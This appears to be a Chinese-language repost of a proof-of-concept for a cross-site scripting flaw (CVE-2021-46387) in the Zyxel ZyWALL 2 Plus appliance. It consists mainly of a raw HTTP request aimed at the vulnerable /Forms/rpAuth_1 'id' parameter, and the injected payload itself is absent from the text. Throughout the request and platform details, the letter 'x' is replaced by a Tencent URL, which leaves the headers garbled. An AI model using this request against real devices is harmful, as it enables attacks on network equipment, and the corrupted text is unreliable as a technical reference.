Zyxel ZyWALL 2 Plus 互联网安全设备 - 跨站点脚本 (XSS)

2022-03-09 16:15:58 浏览数 (2)

版本:ZyWALL 2 Plus

测试平台:Ubuntu Linuhttps://cloud.tencent.com/developer/article/x [Firefohttps://cloud.tencent.com/developer/article/x]

CVE:CVE-2021-46387

代码语言:javascript复制
GET /Forms/rpAuth_1?id=
HTTP/1.1 Host: vuln.ip:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linuhttps://cloud.tencent.com/developer/article/x https://cloud.tencent.com/developer/article/x86_64; rv:95.0) Gecko/20100101 Firefohttps://cloud.tencent.com/developer/article/x/95.0 Accept: tehttps://cloud.tencent.com/developer/article/xt/html,application/https://cloud.tencent.com/developer/article/xhtml https://cloud.tencent.com/developer/article/xml,application/https://cloud.tencent.com/developer/article/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

0 人点赞